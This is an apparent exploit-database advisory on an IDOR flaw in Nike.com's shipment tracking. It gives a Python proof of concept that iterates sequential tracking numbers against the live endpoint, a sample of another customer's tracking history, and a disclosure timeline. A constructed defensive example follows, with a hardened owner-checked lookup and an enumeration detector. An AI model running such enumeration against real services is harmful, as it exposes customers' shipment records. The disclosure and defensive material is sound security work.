Exploit Title: Nike.com - Insecure Direct Object Reference (IDOR)
Exploit Author: Nir Yehoshua
Exploit Date: 2020-5-27
Link to vulnerable website: https://www.nike.com
Category: Web Application

Details:
An IDOR vulnerability was discovered on the Nike.com website that can lead to sensitive information disclosure. The shipment-tracking endpoint returns a parcel's tracking history for any tracking number supplied in the URL, and because tracking numbers are sequential, other customers' shipment records can be retrieved simply by iterating over the number range.

Proof of Concept (Python):
=============================

# Nike.com IDOR by Nir Yehoshua
import requests

# Tracking endpoint; %d is replaced by a sequential tracking number
URL = 'https://secure-global-tracking.nike.com/nike/tracking/%d'

def IDOR():
    # Walk the observed range of sequential tracking numbers
    for number in range(6001050010000, 6001056053999):
        Request(number)

def Request(number):
    # Build the per-shipment URL and print it
    BaseRequest = URL % number
    print(BaseRequest)

IDOR()

Example Data:
=============================

Date        Time   Description                                        Location
2020-02-27  13:45  Delivered                                          MORELIA-MEX
2020-02-27  13:13  Out for Delivery                                   MORELIA-MEX
2020-02-26  11:06  Arrived at Transit Hub                             GUADALAJARA-MEX
2020-02-26  02:00  Customs Released                                   CINCINNATI HUB,OH-USA
2020-02-25  21:35  In Transit to Destination Country                  BRUSSELS-BEL
2020-02-25  15:31  Departed Origin Country                            AMSTERDAM-NLD
2020-02-24  18:22  Pending customs release (Please allow 1-2 days)
2020-02-24  11:01  Arrived Destination Region/Country                 AMS
2020-02-24  10:58  General Update
2020-02-23  16:14  Departed International Hub
2020-02-23  15:59  Arrived International Hub
2020-02-23  11:01  Departed Origin Country                            AMS
2020-02-23  08:12  Packages Details Received - Awaiting Dispatch      NL

* Date/Time values are local times where the activity is located

Disclosure Timeline:
=============================

February 26th - Vulnerability reported to Nike.
February 28th - Initial response and vulnerability confirmation from Nike.
March 4th - Status update from Nike.
April 7th - An update email sent to Nike about the intention to disclose the vulnerability. No response from Nike.
May 27th - The vulnerability was disclosed after the 90-day deadline given to Nike to patch the vulnerability had expired.
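The following is an added example, not part of the advisory and not Nike's code, that models the flaw described above from the defender's side. It shows the vulnerable lookup pattern (any guessable number returns a record) next to a hardened lookup that binds the record to the authenticated owner, and a small detector that scans web-server access logs for a client walking through consecutive tracking numbers. The order store, account names, log format and client addresses are all constructed for the example; the detector's thresholds are assumptions to be tuned against real traffic.

```python
"""Vulnerable vs. hardened tracking lookup, plus enumeration detection.

Added example modelling the IDOR described in the advisory. All data is
constructed; nothing here talks to a real service.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed order store: tracking number -> (owning account, tracking events)
ORDERS = {
    6001050010000: ("alice@example.com",
                    ["2020-02-27 13:45 Delivered MORELIA-MEX"]),
    6001050010001: ("bob@example.com",
                    ["2020-02-26 11:06 Arrived at Transit Hub GUADALAJARA-MEX"]),
}


def lookup_vulnerable(tracking_number):
    """Mirrors the flawed behaviour: whoever can guess a sequential number
    receives the record. The caller's identity is never consulted."""
    record = ORDERS.get(tracking_number)
    return record[1] if record else None


def lookup_hardened(tracking_number, requester):
    """Fix: release the record only to the authenticated account that owns
    the order. An unknown number and a wrong owner produce the same result,
    so the endpoint no longer confirms which numbers exist."""
    record = ORDERS.get(tracking_number)
    if record is None or record[0] != requester:
        return None
    return record[1]


# Constructed access-log format (assumed): client [timestamp] "GET path ..." status
LOG_RE = re.compile(r'^(\S+) \[([^\]]+)\] "GET /nike/tracking/(\d+)')


def detect_enumeration(log_lines, threshold=20, window=timedelta(minutes=5)):
    """Return clients that requested at least `threshold` distinct tracking
    numbers forming a tight numeric run within `window`. A legitimate
    customer checks one or two numbers; an enumerator walks a range."""
    per_client = defaultdict(list)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a tracking lookup; ignore the line
        client, ts, number = m.group(1), m.group(2), int(m.group(3))
        per_client[client].append(
            (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), number))

    flagged = set()
    for client, hits in per_client.items():
        hits.sort()  # by timestamp
        for i in range(len(hits)):
            seen = set()
            for ts, number in hits[i:]:
                if ts - hits[i][0] > window:
                    break
                seen.add(number)
            # "Tight run": the span of numbers is at most twice their count
            if len(seen) >= threshold and max(seen) - min(seen) + 1 <= 2 * len(seen):
                flagged.add(client)
                break
    return sorted(flagged)


# Constructed sample log: one client walking 25 consecutive numbers in
# under three minutes, and one ordinary client checking a single parcel.
SAMPLE_LOG = [
    '10.0.0.5 [2020-02-27 13:4%d:%02d] "GET /nike/tracking/%d HTTP/1.1" 200'
    % (i // 10, (i % 10) * 5, 6001050010000 + i)
    for i in range(25)
] + [
    '10.0.0.9 [2020-02-27 13:50:12] "GET /nike/tracking/6001050010001 HTTP/1.1" 200',
    '10.0.0.9 [2020-02-28 09:02:44] "GET /nike/tracking/6001050010001 HTTP/1.1" 200',
]

if __name__ == "__main__":
    print("vulnerable, no identity:", lookup_vulnerable(6001050010001))
    print("hardened, wrong owner:  ", lookup_hardened(6001050010001, "alice@example.com"))
    print("hardened, right owner:  ", lookup_hardened(6001050010001, "bob@example.com"))
    print("enumerating clients:    ", detect_enumeration(SAMPLE_LOG))
```

The ownership check is the actual remediation for this class of bug; replacing sequential numbers with unguessable identifiers raises the cost of enumeration but on its own is not an access-control fix. The detector is a triage aid for logs from before the fix: it keys on the combination of volume and numeric adjacency, which ordinary customer behaviour does not produce.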